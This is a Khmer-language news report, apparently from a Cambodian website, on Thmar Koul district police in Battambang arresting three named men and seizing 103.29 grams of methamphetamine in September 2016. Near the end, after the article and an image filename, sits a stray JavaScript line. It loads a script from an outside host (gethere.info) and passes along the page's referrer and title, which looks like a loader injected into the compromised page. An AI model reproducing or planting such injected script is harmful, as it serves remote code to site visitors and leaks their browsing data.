នគរបាលស្រុកថ្មគោលឃាត់ខ្លួនជនសង្ស័យ៣នាក់ រឹបអូសបានគ្រឿងញៀនទំងន់ ១០៣.២៩ក្រាម

ខេត្តបាត់ដំបង៖ តាមអនុសាសន៍ណែនាំរបស់ឧត្តមសេនីយ៍ទោ ស ថេត ស្នង ការនៃស្នងការដ្ឋាននគរបាលខេត្តបាត់ដំបង ក៏ដូចការ ចង្អុលបង្ហាញរបស់លោកវរសេនីយ៍ឯក សៅ សាម៉ុន ស្នង ការរងទទួលដឹកនាំអធិការដ្ឋាននគរបាលស្រុថ្មគោលព្រមទាំងអនុវត្ត តាមវិធានការជំនាញដែលដាក់ចេញដោយលោកវរសេនីយ៍ឯក កុយ ហៀង ស្នងការរងទទួលផែន ប្រឆាំងបទល្មើស រួមទាំងការិ យាល័យជំនាញប្រឆាំងគ្រឿងញៀន ផងនោះនៅថ្ងៃទី០១ ខែ កញ្ញា ឆ្នាំ ២០១៦ វេលាម៉ោង ១២ និង ៣០ នាទី លោកវរ សេនីយ៍ត្រី ផង់ សុភាព អធិការនគរបាលស្រុកថ្មគោល បានដឹកនាំកម្លាំងនគរបាល បង្រ្កាករណី( រក្សាទុកប្រើប្រាស់ និងជួញដូរគ្រឿងញៀន ) ដោយខុសច្បាប់មួយករណី ក្នុងភូមិពពាលខែ ឃុំអូរតាគីស្រុកថ្មគោល ខេត្តបាត់ដំបង ។ ក្នុងប្រតិបត្តិការ នេះបានឃាត់ខ្លួនជនសង្ស័យចំនួន ០៣ នាក់ភេទប្រុសគឺ៖


១-ឈ្មោះ ឈុន សុផល អាយុ ៣៥ ឆ្នាំ រស់នៅភូមិចប កាប់ ឃុះអន្លង់រុន ស្រុកថ្មគោល ខេត្តបាត់ដំបង ។
២-ឈ្មោះ វិន វឌ្ឍនា អាយុ ២៥ ឆ្នាំ រស់នៅភូមិជ្រៃ ឃុំជ្រៃ ស្រុកថ្មគោល ខេត្តបាត់ដំបង។
៣-តែ ប៊ុនលាង អាយុ ២៥ ឆ្នាំ រស់នៅសង្កាត់ទួលតាឯក ក្រុងបាត់ដំបង ។

ជាលទ្ឋផលរិបអូសបាន៖ថ្នាំញៀនប្រភេទ មេតំហ្វេតាមីន ( ម៉ាទឹកកក ICE ) ទំងន់ ១០៣.២៩ក្រាម ព្រមទាំងសម្ភារៈសម្រាប់ប្រើប្រាស់គ្រឿងញៀននិងសម្ភារៈពាក់ព័ន្ឋមួយចំនួនទៀត ។


សូមជំរាបជូនថាបញ្ហាគ្រឿងញៀនគឺជាក្តីកង្វល់មួយរបស់យើងទាំងអស់គ្នា ហើយក៏ជាភារកិច្ចរួម ដែលទាមទារឲ្យមានការចូលរួមពីគ្រប់ភាគី អាជ្ញាធរ សមត្ថកិច្ចពាក់ព័ន្ឋក៏ដូច ជាប្រជាពលរដ្ឋនៅមូល ដ្ឋាន បន្តសហការណ៍ និងហ៊ានរាយ ការណ៍ទាន់ពេលវេលាដើម្បីសមត្ថកិច្ចមានវិធានការបង្ក្រាប ។


-ជនសង័្សយ និងវត្ថុតាងកំពុងរៀបចំសំណុំរឿងបញ្ជូនទៅតុលាការខេត្តបាត់ដំបង ដើម្បីចាត់ការ តាមនីតិវិធី ។( រូបភាពក្រុមការងារយេនឌ័រស្រុកថ្ម គោល និងក្រុមការងារប្រតិកម្មរហ័ស) By kosal!

14237628_571041596416826_139057755403601594_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More